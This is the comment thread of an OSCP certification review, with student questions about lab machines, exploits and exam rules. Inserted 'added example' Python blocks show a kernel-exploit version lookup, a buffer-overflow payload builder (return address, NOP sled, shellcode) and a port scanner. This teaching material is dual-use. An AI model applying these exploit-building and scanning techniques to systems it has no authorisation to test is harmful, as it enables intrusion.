  62. Sachin says:

    Great Post!

    Thanks for sharing such useful information.

  63. AK says:

    Hello again, Mike.

    I have since exploited about 10 machines in the lab, and I have to thank you again, for your *nix privilege escalation script really made things simpler for me on some of these machines. In fact, I want to update it myself by adding to the sploits dictionary. I was wondering how you went about building the dictionary. I first thought there was a search index on that could be used to limit the min and max kernel versions, like you do with the dictionary, but there isn’t. It looks like you built the dictionary manually by adding exploits you find here and there, but that seems like a lot of research effort. Can you please shed some light on how you built it?

    I was also wondering if you could possibly e-mail me the IP addresses for pain, humble and fc4. I ask because the admins recommend you finish with these machines and sufference before attempting the exam. Only sufference advertises its host name. As my lab time dwindles down, I don’t want to spend possibly several days just to get a limited shell on these boxes just to find out I may have to spend several more to get root/system. I want to avoid them until I finish with all other machines to better utilize my time.

    Thank you.

    • Mike Czumak says:

      Thanks AK. I’m glad you found that script useful and I certainly encourage you to update it in any way you see fit. I did in fact build the dictionary manually but Google can be a great tool to speed up the process. You might start with a simple “ linux kernel” and use the custom date range or add some additional modifiers to narrow down results. Regarding the IP addresses for those boxes, the network ranges allocated to students differ. There may be consistency in the last two octets but I’m sure that’s also subject to change. As such, I’d rather not post that info since it may be misleading to future students. You might have some luck finding at least some of those IP/hostname pairings via a Google search but since enumeration is such an important part of the course, I would encourage you to locate them on your own. You could turn to the admins for help but I imagine they might tell you the same.
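The exchange above concerns a dictionary of local exploits keyed by the minimum and maximum kernel versions they apply to. As an added example that is not the script AK is porting, the code below shows the part of such a lookup that is easy to get wrong: the running kernel's `uname -r` string has to be reduced to its upstream version and compared numerically, not as a string (otherwise 2.6.9 sorts after 2.6.10 and a distro suffix such as `-194.el5` breaks the comparison). The two dictionary entries are real, widely known kernel bugs included only to make the lookup concrete; their version bounds are approximate here and must be confirmed against Exploit-DB or the CVE text before being relied on.

```python
"""Match a kernel release string against a dictionary of candidate exploits.

Added example, not the privilege escalation script the commenter is porting.
It shows the part that is easy to get wrong when the dictionary is keyed by
minimum and maximum kernel versions: comparing versions numerically, so that
2.6.9 sorts before 2.6.10 and a distro suffix such as -194.el5 is ignored.
The two entries are real, widely known kernel bugs included for illustration;
their version bounds are approximate here and must be confirmed against
Exploit-DB or the CVE text before relying on them.
"""
import platform
import re


def parse_kernel_version(release):
    """'2.6.32-5-amd64' -> (2, 6, 32); '3.10.0-327.el7.x86_64' -> (3, 10, 0).
    Anything after the first '-' is distro packaging, not upstream version."""
    upstream = release.split("-", 1)[0]
    parts = [int(p) for p in re.findall(r"\d+", upstream)]
    if len(parts) < 2:
        raise ValueError("unrecognised kernel release: %r" % release)
    return tuple(parts)


# Constructed dictionary: inclusive min and max upstream versions per entry.
KERNEL_EXPLOITS = [
    {"name": "sock_sendpage NULL pointer dereference (CVE-2009-2692)",
     "min": "2.4.4", "max": "2.6.30.4"},
    {"name": "Dirty COW copy-on-write race (CVE-2016-5195)",
     "min": "2.6.22", "max": "4.8.2"},
]


def candidate_exploits(release, table=KERNEL_EXPLOITS):
    """Names of entries whose [min, max] range contains the running kernel.
    Tuples of different length compare element by element, so (2, 6, 30)
    is inside a range ending at (2, 6, 30, 4) and (2, 6, 30, 5) is outside."""
    version = parse_kernel_version(release)
    hits = []
    for entry in table:
        low = parse_kernel_version(entry["min"])
        high = parse_kernel_version(entry["max"])
        if low <= version <= high:
            hits.append(entry["name"])
    return hits


def string_compare_is_wrong():
    """Why tuples: as strings '2.6.9' > '2.6.10'; as version tuples it is lower."""
    return ("2.6.9" > "2.6.10",
            parse_kernel_version("2.6.9") < parse_kernel_version("2.6.10"))


if __name__ == "__main__":
    release = platform.release()          # same value as `uname -r`
    print(release)
    for name in candidate_exploits(release):
        print("candidate:", name)
```

A version match is only the first filter: the exploit still has to suit the architecture and the distro's backports (RHEL kernels in particular carry fixes under old version numbers), which is why the list is a starting point for research rather than an answer.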

  64. Mew says:

    Hi Mike, any additional materials (books, PDFs, etc.) I can train and learn from for BOF? I’m a newbie at this.

  65. Dave says:

    One of the target hosts in the first net of the lab is hosting a website that is a login screen of the Offensive Security team. I tested spidering, SQL injection, XSS, but the interesting thing is that I could see some interesting stuff.
    When spidering, some URLs showed some funny images, as well I could find some script kinda weird.
    I hope that you could remember if you could see this website, this host is always the IP X.X.X.1, what do you think?
    Did you pwn this host?
    Please let me know.
    Kindest regards.

  66. AK-33 says:

    Mike, would you mind terribly sending me an e-mail so we can communicate in private?

    I am making a more earnest effort to learn how to really capitalize on the information returned by your priv esc script instead of just relying on the list of potential exploits at the end (because I’m not really learning anything that way, so that’s kinda cheating). I would very much like your input on honing my focus and attack strategies.

    Thank you.

  67. Rakish says:

    Thanks a lot Mike for this nice review. My friend, can you send me an email? I have an SQL question.

    Thanks Boss

  68. gerhardtgoll says:

    Hey Mike, excellent review!

    I have a question regarding the limited use of MSF on the exam. If my question may be too revealing please let me know, or just delete it. My comment might be rather lengthy so I apologize in advance if I’m rambling a bit.

    I am relatively new to pen testing but do have the Security+ cert, even though I am not employed in anything near the field I’m trying to prepare myself for. Hence me taking the PWB course, more so just to learn, as they say it, the offensive side of security.

    Now regarding my question, my scripting skills and programming are at a very low level, though I am currently going through the Python for pentesters on pentesteracademy and have gone through all the assembly language, buffer overflows on securitytube as well, its really only starting to all come together (I hope) but it’s obviously much more difficult when you essentially start from scratch to script or code whatever it is you’re trying to do, especially since I have a little over 3 weeks until my lab time is up. I have the Shellcoder’s Handbook and Rootkit Arsenal but really do not have the time to fully devote myself and finish the course, to what appears to be the most significant part about exploitation, not to mention the most fascinating.

    Basically, are msfvenom/msfpayload allowed, to be able to write shellcode, etc., and to use the handler exploit to go along with it? I have exploited several machines in the lab through ExploitDB, Securityfocus, but its been very difficult for me, not to mention very troublesome when I have to drastically improve the code.

    Or perhaps you could answer this question instead: should I focus myself more in this direction, the coding aspect of it, since everything else is much easier for me to follow and implement? Or is coding/scripting, not unnecessary, but can be managed w/o to pass the exam, albeit it would assumably be much more laborious? I’m definitely devoting my time fully to the debugging and the coding aspect after I finish the course, since from my view, that is what’s at the core of it all. Wish I’d known this prior to signing up. Thanks again for such an excellent review as well as your follow up comments to all those who have had questions.

    • Mike Czumak says:

      Thanks for the feedback, I’m glad the review was helpful. Regarding your question about msfvenom/msfpayload, yes they were allowed to be used to generate the shellcode but I would not rely on using any exploit modules from Metasploit. It’s definitely wise to focus your remaining time on topics that you feel weaker in and you should be comfortable with modifying existing exploits (to include changing addresses and replacing shellcode) although the OSCP course (and exam) covers other topics so I wouldn’t get too wrapped up in any one area at the expense of others. I say this with the caveat that I took the course over a year ago, but in my case the exam was true to the course. If you’ve conquered a good number of boxes in the lab and feel comfortable with the skills needed to do so, you should have no problem with the exam.
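The reply above names the three edits a student typically makes to a public exploit: drop in shellcode generated with msfvenom/msfpayload, replace the return address with one valid for the target's build, and keep the buffer the service expects. As an added example that is neither code from the post nor from any published exploit, the script below does those three edits in one function with the checks that catch the usual mistakes (bad characters in the shellcode or in the address, a buffer that grew past its original length). The offset, return address, total length and the stand-in "msfvenom output" are made up for the demo; a real exploit takes the offset and address from the debugger and the shellcode from msfvenom's `-f python` output.

```python
"""Rebuild an exploit buffer after swapping shellcode and return address.

Added example, not code from the post or from any published exploit. The
three edits the reply above mentions (drop in msfvenom/msfpayload shellcode,
point the overwritten return address at the target build, keep the length
the service expects) are done in one function with the checks that catch
the usual mistakes: bad characters in the shellcode or the address, and a
buffer that grew past its original size. Offset, address and shellcode here
are made up; a real exploit takes them from the debugger and from msfvenom.
"""
import re
import struct


def shellcode_from_msfvenom_python(text):
    r"""Join the \x.. literals of msfvenom/msfpayload '-f python' output."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", text))


def find_bad_chars(data, bad_chars):
    """Which of the forbidden bytes occur in data (sorted, unique)."""
    return sorted(set(data) & set(bad_chars))


def build_payload(offset, ret_addr, shellcode, total_len,
                  bad_chars=b"\x00\x0a\x0d", nop_sled=16, filler=b"A"):
    """junk + little-endian return address + NOP sled + shellcode + padding."""
    ret = struct.pack("<I", ret_addr)     # 32-bit little-endian, as in x86 exploits
    for label, blob in (("return address", ret), ("shellcode", shellcode)):
        bad = find_bad_chars(blob, bad_chars)
        if bad:
            raise ValueError("%s contains bad chars: %s"
                             % (label, " ".join("\\x%02x" % b for b in bad)))
    buf = filler * offset + ret + b"\x90" * nop_sled + shellcode
    if len(buf) > total_len:
        raise ValueError("payload is %d bytes, original buffer was %d"
                         % (len(buf), total_len))
    return buf + b"C" * (total_len - len(buf))   # keep the length the service saw


def rejected(*args, **kwargs):
    """True if build_payload refuses these arguments (used for self-checks)."""
    try:
        build_payload(*args, **kwargs)
    except ValueError:
        return True
    return False


# Constructed stand-in for msfvenom output: eight INT3s. Sending these first
# confirms in the debugger that execution lands on the sled before real
# shellcode goes in.
DEMO_MSFVENOM_OUTPUT = '''buf =  b""
buf += b"\\xcc\\xcc\\xcc\\xcc"
buf += b"\\xcc\\xcc\\xcc\\xcc"
'''
DEMO_OFFSET = 2606          # made-up distance to the saved return address
DEMO_RET = 0x11223344       # made-up address of a JMP ESP in a non-ASLR module
DEMO_TOTAL_LEN = 2700       # made-up length of the original crashing string


def demo_payload():
    shellcode = shellcode_from_msfvenom_python(DEMO_MSFVENOM_OUTPUT)
    return build_payload(DEMO_OFFSET, DEMO_RET, shellcode, DEMO_TOTAL_LEN)


if __name__ == "__main__":
    payload = demo_payload()
    print(len(payload), payload[DEMO_OFFSET:DEMO_OFFSET + 4].hex())
```

The bad-character check on the return address is the one people forget: an address such as 0x0a112233 packs to a byte sequence containing a newline, which a line-oriented parser will cut, so the exploit silently never reaches the sled. The INT3 stand-in is also the first thing to send after any change, because a crash at the breakpoints proves the address and offset before the shellcode's own behaviour (encoders, bad-character avoidance, callback address) is in the picture.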

  69. Lajos Nagy says:

    Hi Mike, Congratulation for your Certification! 🙂

    I have a “stupid” question about Windows local priv esc exploits.
    I found some exploits which open a new console window on the machine, so those exploits are useless in a meterpreter shell. These are useful if you have a GUI login on the victim computer. But in the lab the users aren’t members of the Remote Desktop Users local group, so you cannot log in interactively on those machines. (You don’t use these exploits…) How did you test these exploits? In meterpreter, or interactively, or did you modify the exploits?

    • Mike Czumak says:

      Thanks Lajos. I would not assume that all user accounts do not have the ability to authenticate via RDP (in the lab and especially in “real world” scenarios). In such cases, if the user has a limited access account, GUI-based interactive privilege escalation exploits may be very useful.

  70. AK says:

    Hiya, Mike. Your responses to all questions above have been really helpful, so I got some more for you.

    1) A number of commenters have already indicated they had trouble compiling and running the MS08-067 exploit EDB-ID: 7104. You responded that you used Visual Studio for the compilation without error. I did the same thing successfully, but I have not been able to execute it against any of the Windows boxes vulnerable to it. That is because I am using Wine when I do, and I read on the forums that Wine does not load certain SMB libraries needed to run this exploit. Also, another student got it from an admin that certain exploits will *only* work with Metasploit. I was wondering if you were successful in using Wine to run this one. If not, can you please point out how you did it?

    2) On the exam, did your target boxes host all new vulnerable services to exploit or ones that needed new attack vectors not taught in the course, or were they just slight variations of the lab machines?

    3) In regards to your advice two questions above about being comfortable with changing return addresses: in order to do this, you must be able to find the vulnerable application with the same version as the one running on the target, download and debug it. I have experienced two problems with this process. Firstly, some software apps are so out of date, they can no longer be found (not even on the Wayback machine). Secondly, the admins may have modified the software specifically running on the target, so even if you debug the app that’s publicly available to pinpoint the return address, that address may not work for the app on the target. Can you please share a few words of wisdom on if and how you dealt with these issues.

    As always, much gratitude for your time…

    • Mike Czumak says:

      1) I was able to compile via Wine but I executed it from a Windows box.
      2) Without divulging too much about the exam, I would say that it stays true to the concepts of the lab. If you can master the type of exploits found in the lab then you will be prepared for the exam.
      3) If you’re referencing vulnerable software found in the PWK labs, I didn’t experience any issues with finding the correct return addresses/offsets b/c I tested the exploits on the same OS versions.

  71. Chris says:


    Here’s to you and a great blog. I want to personally thank you for taking the time to put together such an informative and well written resource. You know this stuff, so I recognize that you sharing with us is truly a selfless gift.

    Would you mind emailing me? I need some advice related to this topic and an upcoming deadline, and frankly I’m lost.

    So keep up the good work, and I hope to hear from you!


  72. Hi Mike,
    You really did an awesome work by sharing your experiences about OSCP. I am trying to start a website that helps people learn about Security and Pentesting. If possible mail me some of your important articles on OSCP so I will update it and all credit will be yours Sir.


    • Mike Czumak says:

      Thanks very much. At this time, I’m not contributing articles or content to any other sites but you’re more than welcome to link or reference if you’d like.

      – Mike

  73. JK says:

    Hi Mike,

    As many others have stated, thank you for this write-up.

    I work in the security field, but I mostly do policy with some Nessus scanning, etc. I’d say I’m an intermediate (at worst) at Bash (I can handle a Unix command line pretty decently), and a beginner-intermediate level at Python (I normally can at least decipher what’s going on in Python code). However, my experience with C/C++/JS/Ruby is really lacking (I know minimal JS syntax and stuff, but that’s about it). I do know PenTesting basics, and procedures etc (reading Hacking Exposed 7, have completed a number of labs on, etc).

    My question to you is, do you have any scripting resources that I should look into before I register for PWK? I don’t want to spend 1/2 of my lab time trying to figure out how to write scripts. Also, is there a section of the course that is geared toward teaching scripting? I think that’d help me a lot.

    Basically, I’d like to get a feel of what type of knowledge baseline I “SHOULD” have before I start PWK. I did see that you recommended a few SecurityTube vids, bash scripting and some of the megaprimers, but is there anything else you’d recommend I do before I immerse myself into this? I want to make sure I’m prepared for everything that I will be learning.

    Thanks so much! Hope to hear back from you! (Please email me if possible)


    • Mike Czumak says:


      There was a short module on basic Bash scripting when I took the course but based on what you’ve stated, it sounds like you have a grasp on the level of scripting that will be needed (intermediate Bash, beginner/intermediate Python). For me, the best way to learn a new scripting or coding language is to practice automating some real-world problems. My only formal training in coding came from my undergrad Computer Science curriculum where (believe it or not), I learned Ada. Since then, most of my web programming, c, ruby, python, and perl experience has come from self-study, writing exploits, developing Metasploit modules, and tackling on-the-job problems. If you want to improve your proficiency in a particular language, you might consider coming up with a few tasks that you’d like to automate. For example, try writing a port scanner in python. If you get stuck, just Google “port scanner python” and you can find multiple resources on how to do it.

      That said, a course like PWK can also help you improve your scripting skills and I wouldn’t worry too much about mastering scripting before you take it. Understand the basics and you should be fine.

      – Mike
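The reply above suggests writing a port scanner in Python as a first automation exercise. The script below is an added example of that exercise, not code from the post: a TCP connect scanner on the standard library that probes ports from a thread pool with a short timeout and keeps whatever a service sends first (FTP, SSH and SMTP all announce themselves). Because a scanner needs something to scan, a small local listener is bundled so the script can be tried offline; `demo_listener` and `free_closed_port` exist only for that and are not part of the scanner.

```python
"""A small threaded TCP connect scanner with banner grabbing.

Added example following the suggestion above (write a port scanner in Python);
it is not code from the post. Standard library only: a thread pool connects
to each port with a short timeout and keeps whatever the service sends first.
A local listener is included so it can be tried offline; demo_listener and
free_closed_port exist only for that and are not part of the scanner.
"""
import socket
import sys
import threading
from concurrent.futures import ThreadPoolExecutor


def probe(host, port, timeout=1.0):
    """Return (port, is_open, banner). A refused or timed-out connect is
    reported closed; a service that stays silent is open with an empty banner."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)
    try:
        sock.connect((host, port))
    except OSError:                    # ConnectionRefusedError, socket.timeout, ...
        sock.close()
        return port, False, b""
    banner = b""
    try:
        banner = sock.recv(1024)       # services like FTP/SSH/SMTP talk first
    except OSError:
        pass
    finally:
        sock.close()
    return port, True, banner


def scan(host, ports, workers=50, timeout=1.0):
    """Scan the given ports concurrently; return {open_port: banner}."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = pool.map(lambda p: probe(host, p, timeout), ports)
        return {port: banner for port, is_open, banner in results if is_open}


def demo_listener(banner=b"220 demo-ftp ready\r\n"):
    """Constructed target: a listener on 127.0.0.1 (ephemeral port) that greets
    every client with a banner. Returns (server_socket, port); close the
    socket to stop it."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:            # server socket closed
                return
            with conn:
                conn.sendall(banner)

    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1]


def free_closed_port():
    """A port nothing is listening on right now: bind to 0, read it, release it."""
    tmp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tmp.bind(("127.0.0.1", 0))
    port = tmp.getsockname()[1]
    tmp.close()
    return port


if __name__ == "__main__":
    if len(sys.argv) > 1:
        target, ports = sys.argv[1], range(1, 1025)
    else:                               # no argument: scan the built-in demo listener
        srv, demo_port = demo_listener()
        target, ports = "127.0.0.1", [demo_port, free_closed_port()]
    for port, banner in sorted(scan(target, ports).items()):
        print("%d/tcp open %s" % (port, banner.strip().decode("latin-1")))
```

`python scanner.py 192.0.2.10` scans the first 1024 ports; with no argument it scans its own listener. A connect scan completes the handshake and so shows up in the target's logs, which is fine in a lab but is the reason nmap's default SYN scan exists; adding that, or a UDP mode, is the natural next exercise once this one works.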

      • Johnny says:

        I’d also like to chime in, JK.

        Recently completing the course and getting my cert, I have to say, it was not as difficult as it’s made out to be but nonetheless, fascinating since you basically have an entire network at your disposal. That is what makes the course. You’re essentially paying for real-world experience.

        In all honesty, the course videos and PDF are sub-par at best. I understand the “try harder” motto but I found free references which go above and beyond what they provide you, which they btw don’t reference at all. They provide you with very basic examples and leave it up to you to do the rest. I mean, the very basics. It’s quite annoying to be honest, but again, the course is in the labs. The more you learn how to exploit, the more you see the need to automate, as Mike has done with his priv escalation and scanning scripts. You really do learn the most out of it that way, especially when understanding exploit code.

        Saying all that, I refer you to Everything covered in that course applies to the Kali course, and much, much more. Not to mention, it’s free. Also, since you mentioned you did a few modules on, you should consider doing the Nebula, Fusion, etc. exercises as well. If you do these prior, you’ll be more than ready to tackle the labs in Offensive Security.

        • Mike Czumak says:

          Thanks for your input and the great resource.

          • JK says:

            Hi guys,

            One more question…and this is only tangentially related to the OSCP, so I apologize in advance.

            I’m going through the Metasploit Unleashed course on off-sec. However, near the beginning, while learning the fundamentals I’m trying to nmap my Metasploitable…and this is where I run into issues.

            Metasploit for some reason is unable to guess Linux/Unix as the correct OS (gives me QEMU), however in the course ( under the “Importing and Scanning” section) it definitely knows it’s Linux/Unix.

            Also, in the above link under “Creds”…my Metasploit is unable to use that exploit as it says there’s an “unsupported version of MySQL detected”.

            My question is, is anyone familiar with the problems I’m running into? I’d like to be able to make my Metasploit output match that of the walkthrough, but really I just want to make sure I’m not doing anything wrong.

        • JK says:

          Hey guys,

          Thanks for the replies. I’m definitely going to check out all those free resources before I get into PWK (I also have my last semester of grad school for Cybersecurity this spring, so that might be easier to do in tandem with school). Maybe by summer after I graduate and go through those resources I’ll be more than ready for this.

          Thanks so much guys!


  74. TL says:

    Hi Mike Czumak,

    Thanks for nice report.
    Can I have your email, I want to connect to you in private.

  75. gerhardtgoll says:

    Thanks again for your excellent review and follow up. I have a question regarding sufferance and humble. I have less than a week left in my lab time and would really like to get that “Aha!” moment with these two. If you don’t mind, can you send me an email regarding your approach to them and how you managed to succeed. It can be an overview, it doesn’t have to be in exact detail. I feel like I can get in Humble but something is missing (if not everything). I extended my lab time just to get in these systems, but sadly, school has caught up with me after the breaks and I can’t invest 10 hour days anymore as well as getting ready for the exam itself. If not, I will definitely understand, but I think chipping up the 1250$ should at least be enough to satisfy my lust 😉

  76. Astha says:

    Hi Mike,

    Excellent page. I will say it is best one i found till date.
    I have one question. During the exam, will we be asked to whip up a completely new script for a vulnerability, or change a DoS script to an exploit script? Since that would require debugger assistance.
    Also, Can you please mail me since i have some questions on the labs.

  77. ctg says:

    Hey Mike,

    Thanks for the great info.

    So to sum it up, if you can basically go through the whole training material that the course provides and understand everything that is mentioned, one would be fine to pass the exam?

    My background is in networking, not coding..

    My approach for study was going to be..

    – Watch the Securitytube videos that you mentioned above.
    – Watch the Securitytube python videos.
    – Watch the Securitytube assembly and shellcode videos.
    – Read through the offensive security PWK syllabus PDF and try to understand everything mentioned.

    Should that cover it?

    Thanks Mike.

    • Mike Czumak says:

      Yes, that’s a sound approach but I wouldn’t try to master every topic on the syllabus before taking the course. The course will be providing you an opportunity to learn these topics. I would just try to understand some of the basics (scripting, bash, and some limited assembly) so you’re not struggling with these while trying to learn some of the more complex topics.

  78. ctg says:

    Thank you Mike. One last thing.. What would be considered the more complex topics?

    • Mike Czumak says:

      That’s a tough one to answer because it really depends on your background and I think the answer would vary depending on who you ask. Nearly every topic can get complex depending on how deep you want to explore it. I wouldn’t worry too much about which are the easiest or hardest, just enjoy the learning experience!

  79. AK says:

    Hey, Mike.

    I got my OSCP confirmation e-mail earlier today, so I just wanted to drop another thank you note for 1) writing this blog in the first place; 2) publishing your enum scripts, off of which I built my own; 3) all the additional helpful tidbits and elaborations in answering my questions. Students smarter and more experienced than I have failed this exam, but I passed on my first try. That is at least partially thanks to you.

    Have an awesome one!!

    • Osho says:

      Hey AK,

      Would you mind if I asked you a few questions regarding the exam, since you just completed yours and I failed mine 🙂 The main reason being I was searching half the day for that vulnerable software which I had all along. Incredible mistake. I would like to ask you about two other machines I didn’t (one in particular) manage to compromise. If you want, you can send me an email on

    • Mike Czumak says:

      That’s great to hear, Congrats! I’m happy if I provided even the smallest contribution to your successful attempt.

      – Mike

  80. Jon says:

    Mike, This is a really great site and lots of information. I am in module 12 now as we speak and loving this course. If possible could you email me your OSCP notes. Please feel free to delete any content related to lab machines and such. I don’t want to spoil the fun. But your processes are very streamlined and could help save me a bunch of time and would love to see a different thought process. Thanks


    • Mike Czumak says:


      Sorry, but the only documentation I held on to was my final report, which of course I cannot share.

      – Mike

  81. gerhardt says:

    Mike, do you mind if I send you my exam report for review? I was kind of confused about how to follow the recommended lab report guide and how to include all steps so that someone can replicate my exploits exactly. I was a bit trigger happy with the screen shots and it sure as hell didn’t look professional. It’s only around 35 pages and yes, I obviously failed. Would really like some pointers on proper reporting as well as a question regarding one of the machines. Would really appreciate if you wouldn’t mind helping as I’m getting ready to take the exam next Wednesday again. Please let me know. Cheers

    • Mike Czumak says:


      First, sorry I took so long to get back to you. I was taking the OSCE exam this weekend and was off the grid for a few days. I would be happy to give you some pointers on your report writing but I can’t divulge any information regarding the exam targets. I’ll shoot you an email and answer what I can.

      – Mike

    • Mike Czumak says:

      FYI, I tried to email you at the address you provided via the comment but it was rejected by the mail server (account does not exist).

  82. gerhardt says:

    Hey Mike, thanks for responding. I accidentally had my email @yahoo instead of @gmail. How was the OSCE, I was planning on taking that at the end of this month? Best of luck! Also your windows buffer exploits were invaluable for me so I think you should have no problem with the OSCE.

    I’m taking the test as we currently speak and I’m probably going to root all the machines since I have 4 down already and am trying to escalate privs on the last one and I still have around 18 hrs left. But if you wouldn’t mind still looking over my previous report, since I plan on doing this one tomorrow and really would like some pointers on how to include all steps so that someone can directly follow it but place it in the structure that they provide. The email should work now; it was gmail, not yahoo. Thanks again for your benevolence, you’ve certainly helped a lot of people.

    • Mike Czumak says:

      Just resent the email regarding your report. Glad to hear things are going well on your exam. I passed the OSCE — great course, tough exam. I’ll be doing a write-up in the next couple of weeks.

  83. AK says:

    Hi again, Mike.

    I dropped by to leave a note for Osho that I responded to his request for help via his e-mail but never heard a reply.

    Congrats on passing your OSCE. I just started last week. I purchased 60 days of lab time, so I plan to have several weeks of practice time left by the time I complete the modules. In your upcoming blog, I would very much appreciate some hints/resources on how to best utilize this lab time. I read on another blog that, unless you’ve been doing exploit development for a long time, you should prepare to fail your first attempt. I would like to avoid that if possible.

    Looking forward to your blog!

  84. Osho says:

    Hey AK, thanks for the reply! I never received an e-mail from you. My email is Regarding the OSCP, I am happy to say that I passed with flying colors after that first misstep. And the machine I needed help with (linux priv “smtp”) I actually did right the 1st time, just a tiny miscalculation. Thanks for still taking out the time to respond.

    I’m also planning on starting the OSCE by the end of this month (30th). Have you already started the course? Send me an e-mail if you would like to discuss the concepts that will be covered in the course as well as necessary preparations. Here is a really good resource I’ve been going through: don’t know if you’re aware of it, but it is definitely worth checking out. Let me know by e-mail if you want to discuss approaches to the course, etc. It really is helpful when you can shoot off ideas to someone doing the exact same thing. Cheers and best of luck w/ the course!

  85. mokaz says:

    Hi there Mike, just wanted to say thanks for sharing what you have from your OSCP experience. Could I maybe ask for your email in order to potentially contact you at a later point? Thanks a lot, best regards, m.

    • Mike Czumak says:

      Absolutely. I just sent you an email.

      • Mokaz says:

        Hi Mike,

        Just came back to let you know that I’ve successfully passed my OSCP challenge! Thanks for your write-up and encouragement.


  86. Monty says:

    Awesome Summary Mike,

    I’ll be taking the exam in a couple of weeks. I have a couple of questions (no spoilers) that I would like to ask you. Do you mind if I send them via email?


  87. syberdefender says:


    Can you send me an e-mail as well, for an offline question?


  88. Quoc Vu says:

    Great! Thank you a lot. It’s really helpful for me because I’m practicing with the OSCP lab.

    In a previous comment, you mentioned that “commenting out any type of vuln-scanners like nikto since it’s not allowed for the exam”, but in the forum, they stated “We also prohibit the use of automatic exploitation tools (e.g. db_autopwn, browser_autopwn, SQLmap, SQLninja etc). Single-target scanners such as Nmap (and its scripting engine), Nikto, Burp, DirBuster etc are permitted to be used in the exam.” Was Nikto prohibited in your exam?

    I’m also trying to do everything manually. But in the lab, there are many machines where it is really hard to find the hidden URLs without tools like Nikto. How did you do it?

    Thank you again.

    • Mike Czumak says:

      I don’t recall if Nikto was allowed or not but I do know that I didn’t use it nor did I use any automated vulnerability scanners. I did make use of tools such as Burp and dirb, the latter of which is very useful for quickly enumerating site content. You shouldn’t need to do *everything* manually — remember tools are your friends, both in the course and in your profession. The tools I would specifically try to avoid using as much as possible in the lab (and of course on the exam) are vulnerability scanners like Nessus, Metasploit exploit modules (this does not mean auxiliary modules or msfpayload), and other auto-exploit tools like you mentioned above.

  89. dee gee says:

    Hi Mike,

    This is an amazing material and I’m glad you decided to share it selflessly. Congratulations on your success with OSCE!
    Was wondering if I could pick your brain regarding your recon scripts. I’ll appreciate your help.


    • Mike Czumak says:

      Thanks so much for the feedback Dee. I just sent you an email re: my recon scripts.

  90. Jay says:

    Hey Mike,

    Great info on the OSCP Exam! I begin the course in two weeks and the information you provided has me very confident on passing the exam.

    Would you recommend this exam for someone with little linux and scripting experience?

    • Mike Czumak says:

      Thanks Jay. As I’ve said in some of my previous comments/post, I would recommend brushing up on basic linux/windows/scripting before taking the course as there are a lot of great topics that you’re going to be deep diving into and the last thing you probably want to do is struggle with some of the basics.

      – Mike

  91. lostindividual says:

    Hi Mike,

    Mind if I ask you some offline questions in regards to OSCP? I’m currently taking the course and I’m hoping you can help me refocus myself here. Thanks in advance.

  92. Steve Campbell says:

    I’m taking the PWK course now. Thanks for the OSCP review and scripts. I know that the recon-scan scripts won’t work as-is because of the hard coded paths, but I’ve found reading through them very valuable in understanding how to automate nmap scans in Python. I looked through libnmap and python-nmap modules, and they are a little more complex for a Python beginner to understand. Your scripts are much more simple and the ideas found in them can be used to automate virtually any command line tool used in pentesting.

    Thank you!

  93. anon2root says:

    Just saying thanks for the windows exploits csv file, it saves a lot of time :). Also, the priv-esc and recon scripts are cool and can provide an excellent starting point to develop/refine our own scripts.
    Thanks a lot man, keep it going!

  94. Reznov says:

    Tons of thanks Mike for this marvelous review. I am also planning to take the PWK course as soon as possible, but need a few things to take my skills to a higher level just to be sure of succeeding in the exam!

  95. Brandon says:

    HI Mike,
    It’s great from you to share your experience.

    I’m already starting the internal lab for the OSCP exam. Now, I’m in the IT panel but I have some troubles to down the hosts and

    Could you give me some clues about them, please?


  96. Benjamin B says:

    The thing that is holding me back is the 5-6 hours a day and 6 hours a day during the weekend. Who has that time available to him? I surely don’t. Or maybe I didn’t understand it well.

    My idea was spending 4 hours tops during the week and maybe an hour or 2-4 during the weekend. Think that should do it with the 90-day pack?

    • Mike Czumak says:

      Difficult for me to say. I tend to go off on various research tangents when I’m taking any course so the time I spend is not necessarily reflective of what it would take to simply finish the course and attain the cert. The good news is you can always buy extensions if need be.

  97. Lucas Bader says:

    Hey, awesome writeup! I’m an OSCP since April and your review was really helpful in preparation for the exam. I wrote a similar enumeration Script in Python and tried to make it strictly modular. If you want you can check it out :

  98. Chris says:

    Any OSCP’s out there interested in offering tutoring services? I need some guidance that I’m more than happy to pay for.

  99. FreshMan says:

    Hi Mike,

    Your post on OSCP is definitely an asset for network security students like me.
    Is it possible for you to kindly give some tips on sufferance without giving too much away?

    I am stuck on this machine for days.



    • Mike Czumak says:

      Just sent you an email.

      • Thristo says:

        Hi FreshMan, I’m in the same state you were in, I guess.

        I thought no machine was going to stop me after rooting ghost and pain, until I faced “Sufferance”.

        So is it possible to give me some tips based on my progress (on sufferance) without giving too much away (of course)?

        Thanks =)


  100. R Singh says:

    Thanks Mike for your wonderful post. You definitely are a huge inspiration.

    I am a CISSP, CISA, CRISC, CEH, ECSA, SCSA and now working on my OSCP. By far, this is the supreme of all certifications. I am lost, confused but very positively motivated.
    I have a great amount of hands-on windows/linux/unix; very little on scripting though and not much on pen testing. I have pwned 14 machines so far in the lab (with the help of metasploit and some manual public exploits). I am stuck and it looks like brain freeze. I have not yet found the pivot point to the lab network. I can spare at least 15 hours a day to reach the OSCP target within 1 month.

    I would need a strong nudge so that I can get back on track and start thinking like a Pen Tester and be on my target.

    I was running your recon scripts and I am getting this

    root@kali:~# ./recon_scan/
    #### RECON SCAN ####
    #### A multi-process service scanner ####
    #### http, ftp, dns, ssh, snmp, smtp, ms-sql ####
    INFO: Running general TCP/UDP nmap scans for
    INFO: TCP/UDP Nmap scans completed for
    INFO: Detected http on
    INFO: Performing nmap web script scan for
    INFO: Detected ftp on
    /bin/sh: 1: ./ not found
    /bin/sh: 1: ./ not found

    I would really appreciate if you could get back to me.

    Best Regards,

    • Mike Czumak says:

      Just sent you an email

    • Benjamin B says:

      Hi there,

      concerning your script errors :
      put yourself in the same folder as the script when executing and make sure the script is in the same folder.

